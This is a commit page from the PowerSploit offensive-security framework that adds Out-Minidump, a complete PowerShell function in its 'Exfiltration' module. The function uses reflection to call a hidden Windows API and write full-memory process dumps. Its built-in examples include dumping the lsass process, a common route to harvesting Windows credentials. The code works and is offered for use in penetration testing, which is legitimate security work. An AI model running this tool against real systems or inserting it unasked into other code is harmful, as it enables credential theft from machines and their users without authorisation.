aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorMatt Graeber <mattgraeber@gmail.com>2013-05-15 20:54:16 -0400
committerMatt Graeber <mattgraeber@gmail.com>2013-05-15 20:54:16 -0400
commitaf04f7e52838f88069eaaad12b831a4af4a28091 (patch)
tree4711b1cb753fb17ea169a11f7539aa6d1aa95b2e
parentc17f16bf0ed0a1568c6cc503d3a5b68361c1f600 (diff)
downloadPowerSploit-af04f7e52838f88069eaaad12b831a4af4a28091.tar.gz
PowerSploit-af04f7e52838f88069eaaad12b831a4af4a28091.zip
Added Out-Minidump
Out-Minidump writes a process dump file with all process memory to disk. This is similar to running procdump.exe with the '-ma' switch.
Diffstat
-rw-r--r--Exfiltration/Exfiltration.psd13
-rw-r--r--Exfiltration/Out-Minidump.ps1133
-rw-r--r--README.md4
3 files changed, 139 insertions, 1 deletions
diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1
index 7eb9aa2..7c65566 100644
--- a/Exfiltration/Exfiltration.psd1
+++ b/Exfiltration/Exfiltration.psd1
@@ -73,7 +73,8 @@ AliasesToExport = ''
ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})
# List of all files packaged with this module
-FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md'
+FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
+ 'Usage.md'
# Private data to pass to the module specified in RootModule/ModuleToProcess
# PrivateData = ''
diff --git a/Exfiltration/Out-Minidump.ps1 b/Exfiltration/Out-Minidump.ps1
new file mode 100644
index 0000000..b89f3dc
--- /dev/null
+++ b/Exfiltration/Out-Minidump.ps1
@@ -0,0 +1,133 @@
+function Out-Minidump
+{
+<#
+.SYNOPSIS
+
+ Generates a full-memory minidump of a process.
+
+ PowerSploit Function: Out-Minidump
+ Author: Matthew Graeber (@mattifestation)
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+
+.DESCRIPTION
+
+ Out-Minidump writes a process dump file with all process memory to disk.
+ This is similar to running procdump.exe with the '-ma' switch.
+
+.PARAMETER Id
+
+ Specifies the process ID of the process for which a dump will be generated.
+
+.PARAMETER DumpFilePath
+
+ Specifies the path where dump files will be written. By default, dump files
+ are written to the current working directory. Dump file names take following
+ form: processname_id.dmp
+
+.EXAMPLE
+
+ Out-Minidump -Id 4293
+
+ Description
+ -----------
+ Generate a minidump for process ID 4293.
+
+.EXAMPLE
+
+ Get-Process lsass | Out-Minidump
+
+ Description
+ -----------
+ Generate a minidump for the lsass process. Note: To dump lsass, you must be
+ running from an elevated prompt.
+
+.EXAMPLE
+
+ Get-Process | Out-Minidump -DumpFilePath C:\temp
+
+ Description
+ -----------
+ Generate a minidump of all running processes and save them to C:\temp.
+
+.INPUTS
+
+ System.Diagnostics.Process
+
+ You can pipe a process object to Out-Minidump.
+
+.OUTPUTS
+
+ None
+
+.LINK
+
+ http://www.exploit-monday.com/
+#>
+
+ [CmdletBinding()]
+ Param (
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
+ [ValidateScript({ Get-Process -Id $_ })]
+ [UInt16[]]
+ $Id,
+
+ [Parameter(Position = 1)]
+ [ValidateScript({ Test-Path $_ })]
+ [String]
+ $DumpFilePath = $PWD
+ )
+
+ BEGIN
+ {
+ $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
+ $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
+ $Flags = [Reflection.BindingFlags] 'NonPublic, Static'
+ $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
+ $MiniDumpWithFullMemory = [UInt32] 2
+ }
+
+ PROCESS
+ {
+ foreach ($ProcessId in $Id)
+ {
+ $ProcessInfo = Get-Process -Id $ProcessId
+ $ProcessName = $ProcessInfo.Name
+ $ProcessHandle = $ProcessInfo.Handle
+ $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
+
+ $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
+
+ $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
+
+ $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
+ $ProcessId,
+ $FileStream.SafeFileHandle,
+ $MiniDumpWithFullMemory,
+ [IntPtr]::Zero,
+ [IntPtr]::Zero,
+ [IntPtr]::Zero))
+
+ $FileStream.Close()
+
+ if (-not $Result)
+ {
+ $Exception = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()
+ $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
+
+ # Remove any partially written dump files. For example, a partial dump will be written
+ # in the case when 32-bit PowerShell tries to dump a 64-bit process.
+ Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
+
+ throw $ExceptionMessage
+ }
+ else
+ {
+ Write-Verbose "Success! Minidump written to $ProcessDumpPath."
+ }
+ }
+ }
+
+ END {}
+} \ No newline at end of file
diff --git a/README.md b/README.md
index 89ecb42..54f7997 100644
--- a/README.md
+++ b/README.md
@@ -128,6 +128,10 @@ Locates single Byte AV signatures utilizing the same method as DSplit from "clas
A function that takes screenshots at a regular interval and saves them to a folder.
+#### `Out-Minidump`
+
+Generates a full-memory minidump of a process.
+
## Recon
**Tools to aid in the reconnaissance phase of a penetration test.**
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-25 22:25:49 +0000